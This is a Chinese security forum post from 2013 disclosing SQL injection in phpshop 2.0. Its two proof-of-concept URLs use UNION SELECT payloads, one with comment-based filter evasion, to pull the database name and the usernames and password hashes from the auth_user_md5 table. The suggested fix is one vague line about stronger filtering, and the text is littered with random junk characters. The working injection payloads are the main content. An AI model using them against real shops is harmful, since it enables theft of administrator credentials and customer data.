找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2083|回复: 0
打印 上一主题 下一主题

phpshop 2.0 SQL注入及修复

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-18 18:24:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
标题 : phpshop 2.0 SQL Injection Vulnerability7 ], G1 J' v: e" |8 y" @

) G1 ^- Z, b( X  P: ]作者 : By onestree
: @5 \  U( T+ U) x下载地址 : http://code.google.com/p/phpshop/downloads/list
; G$ o& Q5 r( f  X测试地址: windows 7 / ubuntu, \) q# l8 g( H+ c' V8 S

' S6 @9 t" c# V# r
5 U2 e) @8 N( r0 q0 C1 L- HSQLi p0c:# B0 F( Z' s6 U' A& e! A4 e8 f

, W+ e/ u3 l, G, V+ h6 ?==================7 @; m: i; S' h  C( a/ w

" b0 I% I4 v8 X# Rhttp://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
) i- Q8 Q: p  h* W+ Dunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --
; g# s) R3 O% P/ h; P % ]0 J: s: H* y! u5 a! B5 c3 O1 ^% B
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--! i; F; y* B" ~
; _6 V! \: X0 ~  z
修复:2 q5 v* h" Z& a: t/ w8 X; J
加强过滤
1 ]% b  \! @) L9 v$ c# O5 B4 T& U1 u+ T0 ?; h7 q- M. h
3 v5 H4 U$ U6 q* M8 ?
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表